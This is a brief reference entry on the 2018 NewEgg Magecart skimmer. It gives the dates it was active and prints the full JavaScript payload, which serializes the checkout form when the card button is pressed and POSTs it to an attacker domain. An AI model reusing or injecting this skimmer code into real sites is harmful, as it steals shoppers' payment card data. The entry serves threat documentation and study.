NewEgg magecart skimmer

This skimmer exfiltrated payment data from NewEgg's checkout flow by binding an event handler to the payment button and sending a payload to the (Malicious/Dead) url https://neweggstats.com/GlobalData/. This skimmer was active from August 14, 2018 to September 18, 2018.


References permalink

Payload permalink

window.onload = function() {
jQuery("#btnCreditCard.paymentBtn.creditcard").bind(
"mouseup touchend",
function(e) {
var dati = jQuery("#checkout");
var pdati = JSON.stringify(dati.serializeArray());
setTimeout(function() {
jQuery.ajax({
type: "POST",
async: true,
url: "https://neweggstats.com/GlobalData/",
data: pdati,
dataType: "application/json"
});
}, 250);
}
);
};